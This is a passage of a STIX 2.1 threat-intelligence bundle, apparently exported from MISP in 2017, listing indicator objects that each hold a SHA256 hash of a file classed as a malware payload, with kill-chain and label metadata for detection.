"pattern": "[file:hashes.SHA256 = '517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6302-f4a4-493d-ad64-40e5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6303-2c1c-45fa-ba7d-4708950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'cc7b1846fa441c13cc03a8089013c55fd8c7bbabde049cf578df2633afebabff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6304-531c-4be5-9345-459c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'eb47d187d81488b11690ac3191ad8e17774d8a11e559d692fcc344a905c34183']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6305-964c-47d7-8c3b-4146950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '7f8c517b0873991b320d3f94e76f639afadf1481550c8931bae2b46afe204aa9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6306-b034-4995-b6be-4e9c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6307-840c-400b-8ec3-4b1e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'a9fc88b00fe9ba84397aa7eba29a3dcc34da69a2eb89d9135cbfc04725605703']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6308-a274-4ccd-aa7a-42c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'd390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6309-1b10-4a0f-a9d5-4e27950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'fa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630a-abc0-4625-bfa3-4e12950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '8f0cf083af5412a8c228fe8d7755c2dd186248bf73de5db693019a0435de7dad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630b-a1d8-42b1-b384-4dff950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'e593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630c-5440-450b-9b9e-401a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630d-dca8-4942-8076-4ddd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630e-6318-41e3-9156-427b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630e-b0c4-4278-9da4-499c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db630f-4c8c-4dc3-8acd-4ce5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6310-416c-439f-abf6-45a6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6311-0004-43a3-9d37-49c3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'fd7f3195d0b9530131c5860e5db4755f9bf95c5cdc2b1c5563be5f49b0d35857']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6312-4830-48a9-abcd-4a07950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = '2fee7fbabcf1b4381ec3c8ef951bcdf9e204b9d8418815cc84efdd909a882413']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6313-5d9c-416b-a41d-4c3a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"pattern": "[file:hashes.SHA256 = 'f423bf186440e7ac1924a75bf3c532d61d62592d664e7bb004c10881fda3bade']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ca-8378-48da-b38f-47c5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3e21da2bfb27dc428214f94f6424b3d745e5590df45f333ad1f20552afbd410a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64cb-a0b8-4d2c-bf9f-4279950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7ccdecd7997e78e766e2eddc1dd0d5b2a0ff8d601a7acaddf024c0fc2f4204dc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64cc-1530-43d8-9025-4b0a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'fc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64cd-3eb8-4103-abea-4260950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ce-4328-46f5-a0f6-4d3f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64cf-4260-4565-a8eb-41aa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d0-8e7c-4a92-b109-4579950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d1-a254-426a-83fd-46bd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d1-229c-4238-b3c1-41ae950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'beb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d2-8940-4a0f-9095-408e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d3-d3e0-47a6-bc43-493d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d4-c160-4fc2-9d78-4488950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d5-0198-42f4-9817-4f01950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
